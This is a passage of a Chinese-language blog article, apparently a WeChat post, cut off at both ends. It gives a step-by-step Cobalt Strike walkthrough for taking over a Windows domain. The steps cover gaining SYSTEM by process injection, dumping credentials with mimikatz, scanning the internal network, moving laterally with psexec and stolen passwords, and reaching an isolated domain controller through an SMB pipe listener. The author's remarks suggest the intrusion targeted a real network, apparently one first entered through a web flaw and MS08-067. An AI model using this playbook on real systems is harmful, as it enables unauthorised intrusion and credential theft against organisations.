src="https://wechat2rss.xlab.app/img-proxy/?k=96010153&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyAdgzDLksAzq05nAnU488xvHcfgB8CHOZAZZ4UZPnK4UOWQatYtzSbg%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(73, 68, 68);">    </span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">这是机器弹到cs上面的效果。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5307467057101025" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=93dd9e3d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyUIgY1XS7sGYGIndOHuGqeue77kve9mJegjQWyS1lgicVQHM5A97oCBw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">在正式操作之前需要注意一个细节，“last”一栏是靶机与我们的teamserver最后通信的时间间隔，<strong>3.x默认的sleep时间间隔是60s</strong>（此处不太确定是不是默认，我的都是这样的），就是一分钟。可能设计初衷是为了通信隐蔽考虑，对于持久化控制来说这个设置确实也很合理。但是我们在对机器进行操作时就需要自己去修改这个休眠时间了，不然你的每一步操作都需要等待一分钟才能得到结果。（一开始我以为是网络延迟之类的，被逼疯。）</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="1.0583333333333333" data-s="300,640" style="" data-type="png" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=b86978de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyL3bGGsuogAkLn1BSYVMIoXXGzONne7QG156nVicqaw5LtmMtMcpXr1w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">右键靶机栏，session→sleep，将60修改为00，就是将其设置为无时间间隔即时刻保持通信。这个设置也是要等到它的读秒走到一分钟才会生效的，设置成功后会发现通信的时间间隔由秒变成了毫秒。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.20857699805068225" data-s="300,640" style="" data-type="png" data-w="513" src="https://wechat2rss.xlab.app/img-proxy/?k=eae1b04c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMycDpAesgJbpwAic9Cg9guP6DXiapLBCyeuh1wKf4RASKInToQXHhNaPiag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">正常来说<strong>首先应该提升自身权限</strong>，在非system权限操作有时会因为权限不足或者uac阻拦导致出现没有回显、直接报错甚至出完结果就关机的情况。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">常规操作是：右键靶机栏--&gt;access--&gt;elevate--&gt;选择listener和提权方式--&gt;反弹回来新的高权限会话</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">但是这两个在这台机器上都不好使，所以我这里使用进程注入的方法获得system权限。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">进程注入操作：右键靶机栏--&gt;explore--&gt;process list--&gt;inject一个高权限且不容易导致系统崩溃的进程--&gt;选择listener--&gt;获得高权限会话</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">这里有一点需要注意一下，延迟高的时候这个进程列表经常会第一下列不出来，这个时候refresh一下就好了。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.32185748598879105" data-s="300,640" style="" data-type="png" data-w="1249" src="https://wechat2rss.xlab.app/img-proxy/?k=d11e51e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyHwFEb5ZuCK9HLj5UAcEiawkds61Lzic2qo88xSER4F6tKgTtv3AUdEBA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">本台机器的System权限会话get。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.05063291139240506" data-s="300,640" style="" data-type="png" data-w="790" src="https://wechat2rss.xlab.app/img-proxy/?k=33ad79b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyqdCmCNP9F7gp5zfnvc8oCBU4fmJQrfJLCEJPmpqLcEMibptRpxV6X2A%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">这里保险起见为了预防这个系统进程崩掉或者导致系统不稳定，我一般会“spawn”一下，获得一个由这个会话衍生出的同样是system的高权限会话。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.8090909090909091" data-s="300,640" style="" data-type="png" data-w="220" src="https://wechat2rss.xlab.app/img-proxy/?k=1060cb4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMylFePjLY05Hjav9bHH2RmrbjySmTNlkJ3o9aMrSomSybLu2B0xSQnIA%2F640%3Fwx_fmt%3Dpng"/></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">Spawn是产卵、生产的意思，在cs里我的理解就是以同权限派生出新的会话。事实上这个功能的正确姿势是作者为了方便团队成员之间的渗透资源共享，提高分布式入侵的效率。另外也可以提前设置好foreign类型的listener以及msf的监听参数，使用spawn把会话反弹到msf上去。参考链接当中有位大师傅介绍的很详细，我这不在啰嗦。</span></p></blockquote><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">到这里就可以<strong>开始对靶机进行抓取密码和hash的操作</strong>了。一般“dump hashes”和“run mimikatz”我都会进行一遍，两者的结果都是很有用的。获得明文密码在走投无路时配合smblogin有时会起到意想不到的效果。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.426056338028169" data-s="300,640" style="" data-type="png" data-w="568" src="https://wechat2rss.xlab.app/img-proxy/?k=3da43fd4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy7CicvkFhbIg5HkKyGPj2EErZmS4AtVbibe5X8ibLVyDcRuuQD0CzzIuwA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">右键靶机栏，点击interact（与靶机交互）可以看到回显结果。在 view→credentials 当中，或者点击快捷方式栏里小名片图案的快捷方式，可以更加直观地看到已经获得的凭证。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.4409857328145266" data-s="300,640" style="" data-type="png" data-w="771" src="https://wechat2rss.xlab.app/img-proxy/?k=a591962c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyc5jXsoIyvn5e9TpE4akejicxaD0NyS3O0ljNjU1EBotchLPWydp8AAg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5790229885057471" data-s="300,640" style="" data-type="png" data-w="696" src="https://wechat2rss.xlab.app/img-proxy/?k=65a45ec8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyCiau7cHibKCFFuR4eS5qRNLHuuicuttDxM8HbmULx4ZLqBgLRGB4fOwGg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.17652582159624414" data-s="300,640" style="" data-type="png" data-w="1065" src="https://wechat2rss.xlab.app/img-proxy/?k=97f2f3b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMylAnBJYtuic2ZBnkLQuicW4QFTQ2sw3e4icjiaMtAib5d6zXiafssjAZKNjiaA%2F640%3Fwx_fmt%3Dpng"/><br/><span style="font-size: 15px;color: rgb(73, 68, 68);">有时进程注入或者抓密码失败的解决办法也是先尝试使用elevate中的“ms14-068”和“uac.dll“先提升权限。这里我们已经得到这台机器部分用户的密码和哈希。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><strong>下面要进行的操作是arp scan和net view</strong>，去发现内网其它机器，并尝试利用已有的凭证获得其权限，进而获得更多的凭证，最终实现称霸内网。（net view 和 arp scan都能发现内网其它机器）<br/>在2.x当中扫描的选项直接是“arp scan”，但是在3.x当中提供了更多的扫描方式。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">Arp扫描操作：右键靶机栏--&gt;explore--&gt;port scan--&gt;在下图的界面选择内网ip--&gt;scan获得内网其它主机信息</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">在2.x的版本当中，操作之前需要先“add pivot”，实际上这里选择内网ip段的过程就是添加路由表的过程。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.7247191011235955" data-s="300,640" style="" data-type="png" data-w="356" src="https://wechat2rss.xlab.app/img-proxy/?k=399af994&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMySRD89HChfrQX05nMmYeZ1P23RibFJjuXcGIfslpjW9ITOf5p3xaaOHw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">扫描比较消耗时间，扫描的结果会体现在快捷方式栏瞄准镜图案的那一栏，这一栏实际上也是发起攻击的工作台。因为获取信息不足，机器屏幕图标显示是黑色的，后面也不会跟着机器名字。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.4224464060529634" data-s="300,640" style="" data-type="png" data-w="793" src="https://wechat2rss.xlab.app/img-proxy/?k=5a204832&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy85jicQjk5J2hhuBJTbptGiaf0cfofPKZDSxGKIE9Y7km9gncpjefibT6g%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><strong>扫描结束之后就是登录尝试的环节</strong>了，拿我们已经抓到的凭证去尝试入侵内网当中其他的机器。因为已经拿到权限的这台跳板机是03，没有powershell，所以我只能尝试psecex这一种方式，支持psh的高版本系统有更多种方式可以去尝试。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5512367491166078" data-s="300,640" style="" data-type="png" data-w="283" src="https://wechat2rss.xlab.app/img-proxy/?k=68944b7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyOfKf6SAiahG9gp31tQj9pIN3ia8aPXVLjQ3huAGCVNx5FibUtSyCb2C6Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">选择好凭证，再选择相应的session，launch。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6920353982300885" data-s="300,640" style="" data-type="png" data-w="565" src="https://wechat2rss.xlab.app/img-proxy/?k=be717643&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyiaiczFctQLsPmRgdRTpYwHTwqPUF6GXGL59uykdAWFvaCE5BiaZNeQrFA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">木马运行成功的话，log里会全程绿灯，新机器会上线，失败的话就继续去尝试其他机器（成功失败的情况区别下文会具体提到）。因为我当时通过ms08067干掉了另一台正常的域内机器，在这台机器上抓取的有用凭证比通过web拿到的初始跳板机器是要多的多的。所以我这里我通过smblogin手动上线一台机器，假装是通过psexec上线成功的。<br/>现在我们得到了一台新机器的权限。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.18887262079062958" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=21d71b8b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyrr6maeLxUibOzesrJibtNEE4nCibTnGtGqmG6EEGrOsmCyIAAOCypE98Q%2F640%3Fwx_fmt%3Dpng"/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">标准流程走一套：获得新机器--&gt;改sleep时间--&gt;基本命令--&gt;权限提升--&gt;凭证抓取</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">需要注意的一点是，对于机器的权限提升等其他针对目标机器本身的操作，需要在快捷方式栏三个点或者三道杠的界面操作，两者是一样的，只不过三个点的界面可以看到拿到权限目标机器之间的联系，比较骚一点。而对于发现的内网其他机器的攻击就需要在瞄准镜的界面操作。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.18093385214007782" data-s="300,640" style="" data-type="png" data-w="514" src="https://wechat2rss.xlab.app/img-proxy/?k=49155cbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy6GJrZ8icY2ibodY4AJJRtRcvibic7pZdetbPGghvTpk6BAFAvqBOVUDD4Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.31929046563192903" data-s="300,640" style="" data-type="png" data-w="902" src="https://wechat2rss.xlab.app/img-proxy/?k=c064a6ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyDbZqIMxiapKv5WyLenKt7ngx0Gof0erY0Q1UmUymCnGoKNOTAe30u2Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">在cs上执行目标机器上与msf略有不同，cs只需要<strong>“shell 命令”</strong>就可以，如下图所示。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.3817427385892116" data-s="300,640" style="" data-type="png" data-w="482" src="https://wechat2rss.xlab.app/img-proxy/?k=7359d3c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyFkxfUNsyOLfCsHK1YPt107xBQmnWibCEECXLVE2EM1JPmtSdCYuDp2A%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">通过执行命令信息获取基本确定域的基本信息、域控和域内成员，明确目标。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.32531824611032534" data-s="300,640" style="" data-type="png" data-w="707" src="https://wechat2rss.xlab.app/img-proxy/?k=964e8399&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyxwpwkS0MHjwJhZ2raSCjPbGmA4mObUq2NED2lrXrx6NrZBwx7QdtvQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5294117647058824" data-s="300,640" style="" data-type="png" data-w="714" src="https://wechat2rss.xlab.app/img-proxy/?k=540df900&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMybPnz0Dh51pcuWhBGlOBlibcL4bLnkZXe3A1Cicu3y0sgF0VaLEm489sw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6658795749704841" data-s="300,640" style="" data-type="png" data-w="847" src="https://wechat2rss.xlab.app/img-proxy/?k=7b783162&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMykAZsKI5TbAOJIzMZXSxw7jlP6TuwiaMk770PhbWic580QPs1gQoaNZCg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.43243243243243246" data-s="300,640" style="" data-type="png" data-w="555" src="https://wechat2rss.xlab.app/img-proxy/?k=a9ba2a06&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy8libnswCSL8BU6UFYiaib2NEEnAnc6GqQQU0oSITTticPyCdHljpJIxcCw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">这里又有个小知识点，对于“net view”命令的执行，如果采取在interact当中以“shell net view”方式执行该命令的话，就不会触发这个小彩蛋。正确的姿势是在“explore”当中执行cs自带的net view命令。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5966386554621849" data-s="300,640" style="" data-type="png" data-w="357" src="https://wechat2rss.xlab.app/img-proxy/?k=ad8ba56e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyRAoXGJ33cicbib17op3GMXTheGa5mVNxE63HmXKPF5kTfz6Xp2UVGOlw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">彩蛋的效果就是这里，原来屏幕黑掉的机器，现在cs自动按照他们的身份证信息展示了。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.38726207906295756" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=550edc35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy4VkUficVB01UUM88npA0KcTu7Ubxw3ufMSuic8bNwCJ1ehzLchu3PgAA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">（这是之前渗透时域内机器的数量）</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.460880195599022" data-s="300,640" style="" data-type="png" data-w="818" src="https://wechat2rss.xlab.app/img-proxy/?k=b25ed282&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyyUoUNMLAoEUN0fEAjLjbzqMial77BYJkz4bxMMgMb4xYZ92DgTqXrOQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">（这是现在写文章时的数量 ）</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">因为考试和我的重度拖延症等原因，这篇文章拖得太久了，大概两三个月，我也不知道这些机器们都经历了什么。但是数量不是这篇文章的重点，重点是这个流程。</span></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 20px;color: rgb(0, 122, 170);">• 0X03 一発入魂</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">提权抓凭证。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.12735849056603774" data-s="300,640" style="" data-type="png" data-w="1272" src="https://wechat2rss.xlab.app/img-proxy/?k=e2779837&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyEejgkqz0UxQ43ZmOFVHkak5b19XvvZtQ2N1FdeRzYzpOCcu1ItCVSA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">拿完凭证首先尝试对域控发起攻击，失败后继续我们的横向扩张，多个机器多个凭证多个现有session多多组合尝试一下。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.9273049645390071" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=1b24db9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy0ib6ztZbCOfRZ0viaMnJibl5meBs9llTdb45VoG8IooUtnSHMdhj7qC8w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">失败的话这里会报错。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.4482758620689655" data-s="300,640" style="" data-type="png" data-w="551" src="https://wechat2rss.xlab.app/img-proxy/?k=768cc176&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyc7l8frunhGbRauKetT3Ta3ehrKkNLCBF8A1r3kVh13TGHU8KSSTXWg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">成功的话是一路绿灯，而且event log里面会提示您有新主机上线请注意。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.725897920604915" data-s="300,640" style="" data-type="png" data-w="529" src="https://wechat2rss.xlab.app/img-proxy/?k=cb0ecd32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyaeNLscMK7GgicjDqtsujutJO2RzicEnOvFdTqicJribs7iahym8lh143rZA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><strong>切记得到了新机器要记得停下抓凭证，继而去尝试登陆域控。</strong>我们的目的不是横着撸穿所有机器，如果中途得到域管理员的凭证直接get 域控会省很多力气。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">你看，刚才说什么来着。从“realm”可见凭证归属范围。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.095900439238653" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=3df98130&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyE1Bc6ofFnke0sicj8JBw8nfgYyPOib6nTEI30tS24OlGFfs0G9SPTibDw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">一发入魂。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6877192982456141" data-s="300,640" style="" data-type="png" data-w="570" src="https://wechat2rss.xlab.app/img-proxy/?k=72c4147e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyNFjjicvaMXz7zhsB8NG1yYmKPjcGjIyOB19nzCI4Q6rdff4pibJK25qQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">咦？全部成功执行没有报错，为什么没有新会话弹回来呢？<br/>抓到了域控的明文密码，手动登上去看了下，域控是个纯内网环境（其实这样的机器域内有很多）。它们根本无法访问外网更不可能向我们的teamserver弹来回话了。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5068078668683812" data-s="300,640" style="" data-type="png" data-w="661" src="https://wechat2rss.xlab.app/img-proxy/?k=18b6a3cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy3EyJdqV5TNXYzHdU9FdxmDO8icau35gibby63XXySCP1J29HNiavFS0ibg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">这时候就需要新建一个“<strong>Windows/beacon_smb/bind_pipe</strong>”类型的listener了，这种监听方式不需要它回弹会话，借助已有跳板机器将命令中转过去再得到结果。这种方式不是持续通信的，只有当命令发出时才会有数据交互。所以“last”那里的时间会在执行命令之后一直增加，它并不是掉线了，只是它一开始就没“上线”。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.7085889570552147" data-s="300,640" style="" data-type="png" data-w="326" src="https://wechat2rss.xlab.app/img-proxy/?k=2dae573b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy7NOrbKLzL8OAcgdso1hKzAG4lwFwq3Dc8nGjpWWMYsVg8lm9nLiakwg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">选择这个新建的listener再次捅一下域控。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6906854130052724" data-s="300,640" style="" data-type="png" data-w="569" src="https://wechat2rss.xlab.app/img-proxy/?k=722fa26e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyJ4fCQN0cwicObeXsZlTpvq3gzcc69jY1c61q94gyaavDZP05guYaeSQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">Launch，域控来了。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" 